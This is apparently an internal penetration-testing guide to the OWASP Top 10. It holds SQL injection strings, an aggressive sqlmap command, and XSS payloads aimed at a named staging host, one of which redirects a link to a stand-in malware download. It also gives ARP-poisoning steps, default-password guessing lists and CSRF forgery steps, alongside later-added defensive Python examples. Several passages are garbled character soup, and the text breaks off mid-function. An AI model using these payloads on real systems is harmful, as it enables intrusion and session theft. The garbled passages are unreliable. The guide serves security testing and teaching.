Security testing OWASP Top 10 guide

Document Management
Confidentiality
This is a Levi9 Restricted document. According to the Standards of Business Conduct, this document may not be shared outside Levi9 but may be published on the Levi9 Intranet without further restrictions. This document may be shared with the customer, if an appropriate agreement for professional services exists.

Distribution List
To Company / Role Action* Due Date Telephone / e-mail

* Action: Approve, Review, Inform, Other (Please specify)

Document History
Version Description Date Author

References
Source Date Author

Version 1.0

Print Date 15 Jan 2014

Page 2 of 30

Table of contents

1 About OWASP Top 10 .......... 4
1.1 A1 Injection .......... 4
1.1.1 Manual inserting SQL Injection string in the URL and fields .......... 4
1.1.2 Automated inserting SQL Injection strings in the input fields .......... 5
1.2 A2 Cross-Site Scripting (XSS) .......... 9
1.2.1 Reflected Cross Site Scripting (XSS) .......... 9
1.2.2 Stored Cross Site Scripting (XSS) .......... 9
Session .......... 10
1.2.3 Examples for Persistent XSS Attack .......... 10
1.3 A3 Broken Authentication and Session Management .......... 13
1.3.1 Manual testing of Broken Authentication and Session Management .......... 13
1.3.2 Automated testing of Broken Authentication and Session Management .......... 13
Logout and Browser Cache Management .......... 17
1.4 A4 Insecure Direct Object References .......... 18
Attacks on application platform .......... 19
Attacks on other systems .......... 19
1.5 A5 Cross-Site Request Forgery (CSRF) .......... 19
Clickjacking Test Page .......... 20
1.6 A6 Security Misconfiguration .......... 21
1.7 A7 Insecure Cryptographic Storage .......... 21
1.8 A8 Failure to Restrict URL Access .......... 22
1.9 A9 Insufficient Transport Layer Protection .......... 22
1.10 A10 Unvalidated Redirects and Forwards .......... 24
2 Damn Vulnerable Web App (DVWA) .......... 25
3 Appendix .......... 28
4 Bibliography .......... 30

1 About OWASP Top 10


The OWASP Top 10 Web Application Security Risks for 2010 are:

A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
A6: Security Misconfiguration
A7: Insecure Cryptographic Storage
A8: Failure to Restrict URL Access
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards

The list above represents the most widespread vulnerabilities for 2010. A web application can be tested against these OWASP Top 10 points manually or with penetration-testing tools or scanners; a combination of manual testing and automated tools works best. There are many free automated testing tools. The most popular are:

- WebScarab (web scanner): a framework for analyzing applications that communicate using the HTTP and HTTPS protocols.
- BackTrack5: a distribution based on the Debian GNU/Linux distribution, aimed at digital forensics and penetration testing.
- OWASP Live CD: collects some of the best open source security projects in a single (Linux) environment.
- OWASP ZAP: a penetration testing tool for finding vulnerabilities in web applications.

1.1 A1 Injection

Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data. Injection vulnerabilities can be tested in two ways: with a penetration-testing tool, or manually by inserting a SQL injection string into the URL as a parameter or into an input or text field. Many SQL injection strings can be used for such an attack.

1.1.1 Manual inserting SQL Injection string in the URL and fields

Perform String SQL Injection. For example:

SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'

http://phase2relatieplanet.staging.levi9.com/rd?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1

http://phase2relatieplanet.staging.levi9.com/rd?user=*

7"ample $ nsert follo!ing S1L in/ection strings in username and pass!ord field and submit it. L orE$E G L$ H or HaHGHa f application is vulnerable for S1L in/ection, attac8er !ill be logged as first user !ho e"ists in the database. 7"ample * nsert follo!ing S1L in/ection strings in username field> L orE$E G L$M33 nsert anything in pass!ord field IidG3*( order by $% 1(1(utomated inserting S+L )n*ection strings in t"e input fields

For automated SQL injection testing, one of the best tools is Mantra. Mantra is one of the many BackTrack5 penetration tools; it can also be installed as a standalone application (without BackTrack5). Start the Mantra standalone application, select Tools/Application Auditing, and choose “SQL Inject Me”. Open the sidebar and select which SQL injection string you want to test on a specific input field. Start the test by pressing the “Execute” button. All forms on the page can be tested with all attacks, or with the top attacks only, by pressing the “Test all forms with all attacks” or “Test all forms with top attacks” button. Mantra also allows custom SQL injection strings to be added in the Options section, and SQL injection strings can be imported from an .xml file.

XML Injection

XML injection is possible only if the application relies on XML (for instance, stores information in an XML DB). Suppose we have the following XML DB file (the information is stored in XML):

<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
  <user>
    <username>gandalf</username>
    <password>!c3</password>
    <userid>0</userid>
    <mail>gandalf@middleearth.com</mail>
  </user>
  <user>
    <username>Stefan0</username>
    <password>w1s3c</password>
    <userid>500</userid>
    <mail>Stefan0@whysec.hmm</mail>
  </user>
</users>

Tool for testing XML injection: XPath Blind Explorer (http://code.google.com/p/xpath-blind-explorer/downloads/list)

Blind SQL injection

A web site might be vulnerable to blind SQL injection if the id of the page is exposed in the URL. Blind SQL injection is used when a web application is vulnerable to SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data, but it will display differently depending on the result of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. Several tools can automate these attacks once the location of the vulnerability and the target information have been established. The first thing to check is whether the targeted page with an id in the URL is vulnerable or not:

1. Go to the targeted page, e.g. http://www.fakebookreviewer.com/showReview.php?ID=5. The following query will be executed:

SELECT * FROM bookreviews WHERE ID = '5';

2. This populates the review page with data from the review with ID = 5, stored in the table bookreviews. The query happens completely on the server; the user does not know the names of the database, table, or fields, nor does the user know the query string. The user only sees that the above URL returns a book review. A hacker can load the URLs http://www.fakebookreviewer.com/showReview.php?ID=5 AND 1=1 and http://www.fakebookreviewer.com/showReview.php?ID=5 AND 1=2, which may result in the queries:

SELECT * FROM bookreviews WHERE ID = '5' AND '1'='1';
SELECT * FROM bookreviews WHERE ID = '5' AND '1'='2';

respectively. If the original review loads with the "1=1" URL and a blank or error page is returned from the "1=2" URL, the site is likely vulnerable to a SQL injection attack. The hacker may proceed with this query string designed to reveal the version number of MySQL running on the server: http://www.fakebookreviewer.com/showReview.php?ID=5 AND substring(@@version,1,1)=4, which would show the book review on a server running MySQL 4 and a blank or error page otherwise. The hacker can continue to use code within query strings to glean more information from the server until another avenue of attack is discovered or his or her goals are achieved. So, the point is that the web application does not return any information to the attacker after executing the SQL queries. Blind SQL injection is called “blind” because the attacker has no information about the application and database, and tries to guess user names and passwords by inserting malicious code, using information obtained from error messages.[1]

[1] Reference: http://en.wikipedia.org/wiki/SQL_injection; http://www.securiteam.com/securityreviews/5DP0N1P76E.html

Union Query SQL Injection

http://www.example.com/product.php?id=10 ORDER BY 10--

python sqlmap.py -v --url=http://10.1.1.33/dvwa/vulnerabilities/sqli --user-agent=SQLMAP --delay=1 --timeout=15 --retries= --keep-alive --threads=5 --eta --batch --dbms=MySQL --os=Linux --level=5 --risk=3 --banner --is-dba --dbs --tables --technique=BEUST

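
Both the boolean-based probing described in the blind SQL injection section (the 1=1 / 1=2 pair and the @@version check) and the ORDER BY / UNION probing behind the Union Query example leave a recognisable trail in web server access logs. The following Python example is added here and is not part of the original guide; it parses a few constructed Apache-style log lines (not from any real server) and flags the probe patterns, then correlates a tautology/contradiction pair from the same client whose response sizes differ, which is exactly the signal the attacker is looking for.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in Apache common format; paths echo the guide's examples.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jan/2014:10:00:01 +0100] "GET /showReview.php?ID=5 HTTP/1.1" 200 2311
10.0.0.5 - - [15/Jan/2014:10:00:07 +0100] "GET /showReview.php?ID=5%20AND%201=1 HTTP/1.1" 200 2311
10.0.0.5 - - [15/Jan/2014:10:00:09 +0100] "GET /showReview.php?ID=5%20AND%201=2 HTTP/1.1" 200 412
10.0.0.5 - - [15/Jan/2014:10:00:15 +0100] "GET /showReview.php?ID=5%20AND%20substring(@@version,1,1)=4 HTTP/1.1" 200 2311
10.0.0.7 - - [15/Jan/2014:10:02:30 +0100] "GET /product.php?id=10%20ORDER%20BY%2010-- HTTP/1.1" 500 0
10.0.0.7 - - [15/Jan/2014:10:02:41 +0100] "GET /product.php?id=10%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 1802
10.0.0.9 - - [15/Jan/2014:10:03:00 +0100] "GET /showReview.php?ID=7 HTTP/1.1" 200 2290
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) \S+" (\d{3}) (\d+)')

# One regex per probe type; all run against the URL-decoded query string.
PROBE_PATTERNS = {
    "boolean_tautology": re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b", re.I),
    "boolean_contradiction": re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*(?!\1\b)\d+\b", re.I),
    "version_probe": re.compile(r"@@version|\bversion\s*\(", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_probe": re.compile(r"\bunion\b.*\bselect\b", re.I),
}


def parse_line(line: str):
    """Splits one log line into its fields; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status, size = m.groups()
    path, _, query = target.partition("?")
    return {"ip": ip, "time": ts, "method": method, "path": path,
            "query": unquote_plus(query), "status": int(status), "size": int(size)}


def find_probes(log_text: str) -> list:
    """Per-request findings: (client, path, decoded query, [probe types])."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = [name for name, rx in PROBE_PATTERNS.items() if rx.search(rec["query"])]
        if hits:
            findings.append((rec["ip"], rec["path"], rec["query"], hits))
    return findings


def paired_probes(log_text: str) -> list:
    """Clients that sent a tautology and then a contradiction to the same path and
    got responses of different sizes: the page behaved differently, so the client
    has confirmed an injection point. Returns (client, path) pairs."""
    last_true = {}
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["ip"], rec["path"])
        query = rec["query"]
        if PROBE_PATTERNS["boolean_tautology"].search(query):
            last_true[key] = rec["size"]
        elif PROBE_PATTERNS["boolean_contradiction"].search(query) and key in last_true:
            if last_true[key] != rec["size"] and key not in alerts:
                alerts.append(key)
    return alerts


if __name__ == "__main__":
    for finding in find_probes(SAMPLE_LOG):
        print(finding)
    print("confirmed blind-injection reconnaissance:", paired_probes(SAMPLE_LOG))
```

The response-size comparison is the defender's mirror of the attacker's test: the guide says the site is likely vulnerable when the 1=1 page loads and the 1=2 page comes back blank, and that is what a 2311-byte reply followed by a 412-byte reply to the same path looks like in the log.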
1.2 A2 Cross-Site Scripting (XSS)

1.2.1 Reflected Cross Site Scripting (XSS)

1.2.1.1 Manual testing of Cross-Site Scripting (XSS)

Manual testing of Cross-Site Scripting means that every input or text field and every URL parameter of the web application should be tested by inserting a malicious script. Reflected Cross-Site Scripting (XSS) is another name for non-persistent XSS, where the attack is not loaded with the vulnerable web application itself but originates from the victim loading the offending URI. A non-persistent, or reflected, Cross Site Scripting attack requires the user to visit a link specially crafted by the attacker. When the user visits the link, the crafted code is executed by the user's browser. For example: the attacker creates a URL and sends it to the victim (e.g. http://visitme.com); when the victim clicks this link the malicious code is executed and the attacker can steal the victim's session. For example:
http://phase2relatieplanet.staging.levi9.com/rd?user=<script>alert(123)</script>

http://phase2relatieplanet.staging.levi9.com/rd?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a");AllLinks[0].href="http://badexample.com/malicious.exe"; }</script>

Enter the following JavaScript code in the input field and submit it to the server:

<script>alert(document.cookie);</script>

A few examples of inserting XSS into the URL:[2]

http://phase2relatieplanet.staging.levi9.com/rd/search?action=soundex&firstname=<script>alert(document.cookie)</script>

http://phase2relatieplanet.staging.levi9.com/rd/zoeken/uitgebreid-zoeken/?action=<script>alert(document.cookie)</script>
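
What makes the reflected examples above work is that the application copies the user parameter into the page unchanged. The following Python example is added here and is not part of the original guide; it renders a constructed results page both ways, using the `<script>alert(document.cookie)</script>` string from the text as input, and adds the attribute-context case (a reflected URL placed in an href), where encoding alone is not enough and the scheme has to be allow-listed.

```python
import html
from urllib.parse import urlsplit

# Payload taken from the guide's reflected XSS examples.
PAYLOAD = "<script>alert(document.cookie)</script>"


def render_vulnerable(user: str) -> str:
    """Reflects the 'user' parameter into the HTML body verbatim."""
    return f"<html><body><h1>Results for {user}</h1></body></html>"


def render_safe(user: str) -> str:
    """HTML-encodes the input for the element-content context: <, >, &, ' and "
    become entities, so the browser shows the payload as text instead of running it."""
    return f"<html><body><h1>Results for {html.escape(user, quote=True)}</h1></body></html>"


def safe_link(url: str) -> str:
    """A reflected URL used as an href needs two things: an allow-listed scheme
    (javascript: survives entity encoding untouched) and attribute encoding."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">link</a>'


def is_inert(rendered: str) -> bool:
    """True when no raw <script> tag survived into the output."""
    return "<script" not in rendered.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(safe_link("javascript:alert(1)"))
```

The encoding function is chosen by output context: html.escape is right for text between tags and for quoted attribute values, but a URL attribute also needs the scheme check, and a value dropped into a script block would need a JavaScript string encoder instead.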

1.2.2 Stored Cross Site Scripting (XSS)

Stored Cross-Site Scripting (XSS) is the most dangerous type of Cross Site Scripting. Web applications that allow users to store data are potentially exposed to this type of attack. This chapter illustrates examples of stored cross site scripting injection and related exploitation scenarios.

[2] Reference: http://theinsider.deep-ice.com/texts/xss_exposed.txt

In a persistent attack, the code injected by the attacker is stored in secondary storage (mostly a database). Stored XSS does not need a malicious link to be exploited. A successful exploitation occurs when a user visits a page with a stored XSS. The following phases relate to a typical stored XSS attack scenario:

- Attacker stores malicious code into the vulnerable page
- User authenticates in the application
- User visits the vulnerable page
- Malicious code is executed by the user's browser

<or e"ample> Attac8er inserts some malicious code on the vulnerable page and save this. This malicious code is stored in the database. .hen some user visit attac8erEs page malicious code !ill be e"ecuted. Session @TT& protocol is a stateless protocol, !hich means, it !onEt maintain any state !ith regard to the re;uest and response. All re;uest and response are independent of each other. But most of the !eb applications donEt need this. -nce the user has authenticated himself, the !eb server should not as8 the usernameCpass!ord for the ne"t re;uest from the user. To do this, they need to maintain some 8ind of states bet!een the !eb3bro!ser and !eb3server !hich is done through the NSessionsO. .hen the user login for the first time, a session ' !ill be created by the !eb server and it !ill be sent to the !eb3bro!ser as Ncoo8ieO. The entire sub3se;uent re;uest to the !eb server !ill be based on the Nsession idO in the coo8ie. 1(-(1 23amples for 'ersistent /SS ttac4

The sample web application given below, which demonstrates the persistent XSS attack, does the following: go to some page with input or text fields, enter malicious code and save. The malicious code is now stored in the database.

1.2.2.1 Automated testing of Cross-Site Scripting (XSS)

Run the Mantra “XSS Me” tool as a standalone application or in BackTrack5. Select the fields you want to test, choose an XSS string and press the Execute button, or just press the “Test all forms with all attacks” button to test all forms on the page with all XSS strings defined in the Options section. More XSS strings can be added in the Options section.

DOM based XSS fault

The DOM, or Document Object Model, is the structural format that may be used to represent documents in the browser. The DOM enables dynamic scripts such as JavaScript to reference components of the document such as a form field or a session cookie. When an attacker enters an img tag in the input field and submits it, and the application is not secure, there is a possibility to deface the website (the layout of the page will be broken). For example: find a URL that points to some image (the easiest way is to select the image and use “copy link location”), enter the following in the input field and submit:

<img src=http://[staging-host]/relatieplanet/memberimages/thb.JPG>

1.3 A3 Broken Authentication and Session Management

1.3.1 Manual testing of Broken Authentication and Session Management

Authentication and session management includes all aspects of handling user authentication and managing active sessions. Authentication is a critical aspect of this process, but even solid authentication mechanisms can be undermined by flawed credential management functions, including password change, forgot my password, remember my password, account update, and other related functions. Because “walk by” attacks are likely for many web applications, all account management functions should require reauthentication even if the user has a valid session id.

Example: a user of the site should not be able to see protected content if he/she is not authorized to see it. So the user passes authentication, but if he/she is not authorized to see something on the site, the application must not allow him/her to see that content. User A has permission to see some image or document, but user B does not have that permission (is not logged in); so if user A sends a URL containing the session ID to user B, user B should not be able to see it.

What should be checked? This is the list:

1. Are credentials always protected when stored, using hashing or encryption?
2. Can credentials be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs)?
3. Are session IDs exposed in the URL (e.g., URL rewriting)?
4. Are session IDs vulnerable to session fixation attacks?
5. Do session IDs time out and can users log out?
6. Are session IDs rotated after successful login?
7. Are passwords, session IDs, and other credentials sent only over TLS connections?

1.3.2 Automated testing of Broken Authentication and Session Management

From the main menu select the following:

BackTrack/Privilege Escalation/Sniffers/Network Sniffers/ettercap-gtk

Find the etter.conf file, located in the etc folder (\\etc\etter.conf). Edit it, find the Linux section for “iptables” in this file and remove the # sign from these two lines:

#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Open ettercap-gtk, click on Sniff, choose Unified sniffing, select the network interface from the list (e.g. eth1) and click OK. Go to Hosts and click on Scan for hosts; now go to the Host list, select the wanted host from the list and click on Add to Target 1, select another and click on Add to Target 2. Choose Mitm from the menu and click on Arp poisoning, then select Sniff remote connections.

Choose Start and click on Start sniffing. To check whether the poisoning succeeded, go to Plugins and open Manage the plugins.

From the main menu select the following: BackTrack/Privilege Escalation/Password Attacks/gtk-hydra

Now, open a browser on the victim machine (the machine from the host list that was poisoned).

Default or guessable (dictionary) user account

Try the following usernames: "admin", "administrator", "root", "system", "guest", "operator", or "super". These are popular among system administrators and are often used. Additionally you could try "qa", "test", "test1", "testing" and similar names. Attempt any combination of the above in both the username and the password fields. If the application is vulnerable to username enumeration, and you successfully manage to identify any of the above usernames, attempt passwords in a similar manner. In addition, try an empty password or one of the following: "password", "pass123", "password123", "admin", or "guest" with the above accounts or any other enumerated accounts. Further permutations of the above can also be attempted. If these passwords fail, it may be worth using a common username and password list and attempting multiple requests against the application. This can, of course, be scripted to save time.[3]

Brute Force Dictionary Attack

Dictionary-based attacks consist of automated scripts and tools that try to guess usernames and passwords from a dictionary file. A dictionary file can be tuned and compiled to cover words probably used by the owner of the account that a malicious user is going to attack. The attacker can gather information (via active/passive reconnaissance, competitive intelligence, dumpster diving, social engineering) to understand the user, or build a list of all unique words available on the website.

[3] Reference: https://www.owasp.org/index.php/Testing_for_Default_or_Guessable_User_Account_%28OWASP-AT-003%29

Start the OWASP ZAP tool. Select Brute Force, select the site, choose a directory-list file from the dropdown box and press Play. It is possible to create your own directory-list.

Bypassing authentication schema

- Direct page request (forced browsing)
- Parameter Modification
- Session ID Prediction

Direct page request (forced browsing)

If a web application implements access control only on the login page, the authentication schema could be bypassed. For example, if a user directly requests a different page via forced browsing, that page may not check the credentials of the user before granting access. Attempt to directly access a protected page through the address bar in your browser to test using this method. Try with this: http://somesite.com/users/Administrator

Parameter Modification

If the user is not authenticated, the parameter in the URL will be: http://somesite/homepage.jsp?authenticated=no
Type this in the browser: http://somesite/homepage.jsp?authenticated=yes

Session ID Prediction

Many web applications manage authentication using session identification values (SESSION ID). Therefore, if session ID generation is predictable, a malicious user could find a valid session ID and gain unauthorized access to the application, impersonating a previously authenticated user. In the following figure, the values inside cookies increase linearly, so it could be easy for an attacker to guess a valid session ID.

This is not correct: the distribution of cookie values over time must be dispersed; if it is not, there is a possibility that an attacker predicts the session ID.

To check this, start WebScarab, open the Session ID Analysis tab, select Request, enter the number of Samples and press Test. Click on the Fetch button, and after that go to the Analysis tab. Select the session identifier. Repeat this action for different requests in order to get a diagram of cookie values over time.
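
The WebScarab check above looks for a trend in cookie values over time; the same reasoning can be automated. The following Python example is added here and is not part of the original guide; it takes a list of hex session identifiers (a constructed linearly increasing sample, and a sample drawn from the OS random source), computes the steps between consecutive values, flags identifiers whose steps are far smaller than the identifier space, and shows how a server should mint them.

```python
import secrets
from statistics import pstdev

# Constructed sample: a counter-based session cookie of the kind the guide warns about.
LINEAR_IDS = ["0000a1f0", "0000a1f1", "0000a1f2", "0000a1f3", "0000a1f4"]


def issue_session_id(nbytes: int = 16) -> str:
    """128 bits from the OS CSPRNG; no relation between successive values."""
    return secrets.token_hex(nbytes)


def analyse_session_ids(ids: list) -> dict:
    """Numeric version of 'plot the value over time': the differences between
    consecutive hex IDs. The verdict is 'predictable' when the steps are constant,
    or when the largest step covers only a negligible part of the identifier space
    (here: less than 2 ** (bits / 4), a heuristic threshold chosen for the example)."""
    if len(ids) < 3:
        return {"predictable": None, "reason": "need at least 3 samples"}
    values = [int(s, 16) for s in ids]
    nbits = max(len(s) for s in ids) * 4
    deltas = [b - a for a, b in zip(values, values[1:])]
    constant_step = pstdev(deltas) == 0
    small_steps = max(abs(d) for d in deltas) < 2 ** (nbits // 4)
    if constant_step:
        reason = "constant step between samples"
    elif small_steps:
        reason = "steps tiny relative to the identifier space"
    else:
        reason = "no linear trend"
    return {"bits": nbits, "deltas": deltas,
            "predictable": constant_step or small_steps, "reason": reason}


if __name__ == "__main__":
    print(analyse_session_ids(LINEAR_IDS))
    print(analyse_session_ids([issue_session_id() for _ in range(10)]))
```

A counter with occasional gaps (for instance 1000, 1003, 1005) is caught by the second rule even though its steps are not constant; identifiers from secrets.token_hex pass because consecutive values differ by amounts on the order of the whole 128-bit space.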

Logout and Browser Cache Management

In this test case, we check that the logout function is properly implemented, and that it is not possible to “reuse” a session after logout. We also check that the application automatically logs out a user when that user has been idle for a certain amount of time, and that no sensitive data remains stored in the browser cache.

Only one cookie exists to store session info

Check the following:
- session IDs & cookies: a cookie is data stored on the client (the recommendation is a session cookie instead of a persistent cookie)
- when the browser is closed, temporary cookies (session cookies) should be erased
- a session's data is stored on the server (only 1 session per client)
- the only data the client stores is a cookie holding a unique session ID
- on each page request, the client sends its session ID cookie, and the server uses this to find and retrieve the client's session data

Check reset password


Password Reset

The first step is to check whether secret questions are used. Sending the password (or a password reset link) to the user's email address without first asking for a secret question means relying 100% on the security of that email address, which is not suitable if the application needs a high level of security.

- Check: are multiple questions offered?
- Check: does the password reset allow unlimited attempts?
- Check: does the password-reset tool display the old password?
- Check: does it email the password to some pre-defined email address?
- Display a Captcha code after successful verification of the username and/or Security Question.
- Send a link to the user's registered email address. The link should have a random token associated with it. The link should be short-lived, one-time use only, and SSL enabled. Once the user resets the password, the link should no longer be usable.
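
The last point above lists the properties of a safe reset link: a random token, a short lifetime, single use, delivery over SSL. The following Python example is added here and is not part of the original guide; it implements a small token store with an injectable clock so expiry and one-time behaviour can be exercised without waiting, and keeps only a hash of the token server-side so a leaked table does not yield usable reset links. The 15-minute lifetime and the https://example.test base URL are assumptions made for the example.

```python
import hashlib
import secrets
import time

RESET_TTL_SECONDS = 15 * 60                     # assumed lifetime for the example
RESET_BASE_URL = "https://example.test/reset"   # assumed; must be an https URL


class ResetTokenStore:
    """Issues and redeems password-reset tokens: random, expiring, one-time."""

    def __init__(self, clock=time.time):
        self._clock = clock          # injectable so tests can move time forward
        self._pending = {}           # sha256(token) -> (username, expires_at)

    def issue(self, username: str) -> str:
        token = secrets.token_urlsafe(32)        # 256 random bits, URL-safe alphabet
        digest = hashlib.sha256(token.encode()).hexdigest()
        self._pending[digest] = (username, self._clock() + RESET_TTL_SECONDS)
        return token                              # only the digest stays on the server

    def redeem(self, token: str):
        """Returns the username for a valid token, otherwise None. The entry is
        removed on first use whether or not it turns out to be expired."""
        digest = hashlib.sha256(token.encode()).hexdigest()
        entry = self._pending.pop(digest, None)
        if entry is None:
            return None
        username, expires_at = entry
        if self._clock() > expires_at:
            return None
        return username


def reset_link(token: str) -> str:
    """Builds the link that goes into the e-mail; refuses a non-https base URL."""
    if not RESET_BASE_URL.startswith("https://"):
        raise ValueError("reset links must be delivered over TLS")
    return f"{RESET_BASE_URL}?token={token}"


if __name__ == "__main__":
    store = ResetTokenStore()
    t = store.issue("alice")
    print(reset_link(t))
    print(store.redeem(t), store.redeem(t))   # alice, then None: second use rejected
```

Looking tokens up by their SHA-256 digest also sidesteps timing differences in string comparison, since the dictionary lookup is on a fixed-length hash rather than on the secret itself.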

Password Remember

If the password is stored in a permanent cookie, then the password must be hashed/encrypted and not sent in the clear.

Check if the session is refreshed

After killing the browser or deleting cookies and cache in the browser, the current session must be terminated; if it is not, we have a security issue.

1.4 A4 Insecure Direct Object References

The best way to find out if an application is vulnerable to insecure direct object references is to verify that all object references have appropriate defenses. To achieve this, consider:

1. For direct references to restricted resources, the application needs to verify that the user is authorized to access the exact resource they have requested.
2. If the reference is an indirect reference, the mapping to the direct reference must be limited to values authorized for the current user.

For example: user A is authenticated on the site but does not have permission to see some parts of it. So when user A tries to access a forbidden area, the application must check whether he/she is authorized to see the hidden content, and if not, must prevent him/her from seeing it. An attacker who is an authorized system user simply changes a parameter value that directly refers to a system object to another object the user is not authorized for. This behavior must be prevented. The best way to test this type of vulnerability is manual testing or code review.

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Start the OWASP ZAP tool (make sure that the proxy is configured in the browser). Navigate through the site; all traffic goes via the proxy and OWASP ZAP intercepts all requests and responses. From the tree, select which page and which method you want to test (GET or POST). From the Request tab select the URL, right click, and click "Fuzz...". From Fuzz Category choose Path Traversal and click the Fuzz button to start testing.
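
Points 1 and 2 above describe the two acceptable designs: check ownership on every direct reference, or hand out indirect references that are only ever mapped for the current user. The following Python example is added here and is not part of the original guide; it implements both on a constructed in-memory document store and shows that a parameter copied from another user's URL resolves to nothing in either design.

```python
import secrets


class DocumentStore:
    """Documents keyed by a real database id, each with an owner (constructed data)."""

    def __init__(self):
        self._owner = {}        # doc_id -> username
        self._content = {}      # doc_id -> text
        self._handles = {}      # (session_id, opaque handle) -> doc_id

    def add(self, doc_id: int, owner: str, text: str) -> None:
        self._owner[doc_id] = owner
        self._content[doc_id] = text

    # Design 1: direct reference, authorisation check on every single access.
    def fetch_direct(self, user: str, doc_id: int):
        if self._owner.get(doc_id) != user:
            return None          # foreign or unknown id: indistinguishable from "not found"
        return self._content[doc_id]

    # Design 2: indirect references minted per session, for the user's own objects only.
    def handles_for(self, session_id: str, user: str) -> dict:
        """Returns {opaque handle: short title} for the documents this user owns;
        the real ids never reach the client, so there is nothing to tamper with."""
        out = {}
        for doc_id, owner in self._owner.items():
            if owner == user:
                handle = secrets.token_urlsafe(8)
                self._handles[(session_id, handle)] = doc_id
                out[handle] = self._content[doc_id][:20]
        return out

    def fetch_indirect(self, session_id: str, handle: str):
        """A handle is only meaningful together with the session that minted it."""
        doc_id = self._handles.get((session_id, handle))
        return None if doc_id is None else self._content[doc_id]


def build_sample_store() -> DocumentStore:
    # Constructed data: two users, one confidential document each.
    store = DocumentStore()
    store.add(101, "alice", "Alice's salary statement for January")
    store.add(102, "bob", "Bob's salary statement for January")
    return store


if __name__ == "__main__":
    s = build_sample_store()
    print(s.fetch_direct("bob", 101))             # None: Bob changed ?doc=102 to 101
    handle = next(iter(s.handles_for("sess-alice", "alice")))
    print(s.fetch_indirect("sess-bob", handle))   # None: handle belongs to Alice's session
```

The indirect design also changes what a tester sees: with per-session handles, "change the parameter to the next number" stops being a meaningful test, while with direct ids the test from the text (an authorised user editing the id) is exactly what fetch_direct must withstand.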

Unrestricted Upload of File with Dangerous Type

The web application allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment.
Attacks on application platform

Check the following:

- Upload .jsp file into web tree: jsp code executed as web user
- Upload .gif to be resized: image library flaw exploited
- Upload huge files: file space denial of service
- Upload file using malicious path or name: overwrite critical file
- Upload file containing personal data: other users access it
- Upload file containing "tags": tags get executed as part of being "included" in a web page
ttac4s on ot"er systems

Check the following:

2pload .e"e file into !eb tree 3 victims do!nload tro/aned e"ecutable 2pload virus infected file 3 victimsH machines infected 2pload .html file containing script 3 victim e"periences Cross3site Scripting 45SS6

1.5 A5 Cross-Site Request Forgery (CSRF)

Besides XSS and Injection, CSRF is the most common vulnerability on web sites. Consider anyone who can trick your users into submitting a request to your website: any website or other HTML feed that your users access could do this. For example: the attacker creates forged HTTP requests and tricks a victim into submitting them via image tags, XSS, or numerous other techniques. If the user is authenticated, the attack succeeds.

How to create a forged page with an image tag? First, download the Piñata CSRF tool from http://code.google.com/p/pinata-csrf-tool/downloads/list

1. Install Python.
2. Unzip the Piñata tool.
3. Start some scanner tool (WebScarab, Paros or something similar). With this tool the attacker intercepts the HTTP GET request, which will be used for creating the forged page with the img tag.
4. Go to the vulnerable site and perform some action (in this case, as the attacker).
5. Copy the HTTP request.
6. Paste it into the CSRFBody.txt file.

7. Open a command line, go to the Piñata folder and run the piñata.py file.
8. Check the folder where you unzipped the Piñata tool; an .html file should have been created.
9. This html file has in its body an img tag with the malicious code in it.
10. Open this html page in a new browser. If the application is not safe, every time the user reloads the page or clicks a link leading to the malicious page the code will be executed, because the browser automatically starts loading the images on the page.
11. If the application is safe against CSRF, nothing will happen.
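
The forged page built above succeeds because the browser attaches the victim's session cookie to the GET request for the image, and the server treats that GET as an authorised action. The following Python example is added here and is not part of the original guide; it models the server-side defence as a small handler over a constructed session table: state-changing requests are accepted only over POST and only when they carry the synchroniser token tied to the submitting session.

```python
import hmac
import secrets

SAFE_METHODS = ("GET", "HEAD", "OPTIONS")


class CsrfProtector:
    """One random token per session, embedded in every form and checked on submit."""

    def __init__(self):
        self._tokens = {}   # session_id -> token

    def token_for(self, session_id: str) -> str:
        token = self._tokens.get(session_id)
        if token is None:
            token = secrets.token_urlsafe(32)
            self._tokens[session_id] = token
        return token

    def form_html(self, session_id: str, action: str) -> str:
        """The legitimate form: the token travels as a hidden field."""
        return (f'<form method="POST" action="{action}">'
                f'<input type="hidden" name="csrf_token" value="{self.token_for(session_id)}">'
                f'<input type="submit" value="Transfer"></form>')

    def handle_transfer(self, method: str, session_id: str, form: dict) -> str:
        """Server side of a state-changing action. Returns a short status string."""
        if method in SAFE_METHODS:
            # An <img src=...> can only produce a GET; never change state on one.
            return "rejected: state change requires POST"
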